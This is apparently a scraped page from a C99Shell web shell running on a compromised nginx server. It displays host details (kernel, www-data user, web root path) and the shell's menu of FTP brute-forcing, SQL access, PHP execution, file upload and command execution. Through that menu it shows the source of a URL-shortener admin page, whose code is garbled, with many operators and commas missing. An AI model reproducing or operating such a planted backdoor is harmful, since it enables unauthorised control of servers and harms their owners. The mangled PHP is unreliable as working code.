!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phurl/admin/   drwxrwxr-x
Free 83.35 GB of 96.73 GB (86.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (2.64 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start();
require_once("../config.php");
require_once("../functions.php");

if (!is_admin_login()) {
    header("Location: login.php"true301);
    exit();
}

require_once("header.php");

db_connect();



$delete_id = (int) @$_GET['delete_id'];

if ($delete_id 0) {
    mysql_query("DELETE FROM ".DB_PREFIX."urls WHERE id = '$delete_id'") or db_die(__FILE____LINE__mysql_error());
}

$page = (int) @$_GET['page'];

if ($page 1) {
    $page 1;
}

$db_query "1 AND ";

$search_alias mysql_real_escape_string(@$_GET['search_alias']);
$search_url   mysql_real_escape_string(@$_GET['search_url']);

if (!empty($search_alias)) {
    $db_query .= "(code = '$search_alias' OR alias = '$search_alias') AND ";
}

if (!empty($search_url)) {
    $db_query .= "url LIKE '%$search_url%' AND ";
}

$db_query  substr($db_query0, -5);

$db_result mysql_query("SELECT COUNT(id) FROM ".DB_PREFIX."urls WHERE $db_query") or db_die(__FILE____LINE__mysql_error());
$db_row    mysql_fetch_row($db_result);
$db_count  = (int) $db_row[0];
$db_start  = ($page 1) * 25;
$db_pages  ceil($db_count 25);

$db_result mysql_query("SELECT * FROM ".DB_PREFIX."urls WHERE $db_query ORDER BY date_added DESC LIMIT $db_start, 25") or db_die(__FILE____LINE__mysql_error());

echo "<table id=\"url_list\">\n";
    echo "<tr>\n".
         "<td><u>ID</td></u>\n".
         "<td><u>Code</u></td>\n".
         "<td><u>Alias</u></td>\n".
         "<td><u>Long URL</u></td>\n".
         "<td><u>Counter</u></td>\n".
          "<td><u>Date Added</u></td>\n".
         "<td><u>Delete</u></td>\n".
      "</tr>\n";

while ($db_row mysql_fetch_assoc($db_result)) {
    $db_row array_filter($db_row"stripslashes");

    extract($db_rowEXTR_OVERWRITE|EXTR_PREFIX_ALL"u");

    if (empty($u_alias)) {
        $u_alias "";
    }

    echo 
      "<tr>\n".
      "<td>$u_id</td>\n".
         "<td>$u_code</td>\n".
         "<td>" htmlentities($u_alias) . "</td>\n".
         "<td>" htmlentities($u_url) . "</td>\n".
         "<td>" .$u_counter"</td>\n".
         "<td>$u_date_added</td>\n".
         "<td><a href=\"javascript:delete_url($u_id);\">Delete</a></td>\n".
         "</tr>\n";
unset($u_id$u_code$u_alias$u_url,$u_counter$u_date_added);
}

echo "</table>\n";

if ($db_count 25) {
    echo "<p>\n";

    if ($page 1) {
        echo "<a href=\"index.php?page=".($page 1)."\">&laquo; Prev</a> ";
    }

    if ($page $db_pages) {
        echo "<a href=\"index.php?page=".($page 1)."\">Next &raquo;</a>";
    }

    echo "</p>\n";
}

require_once("footer.php");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0069 ]--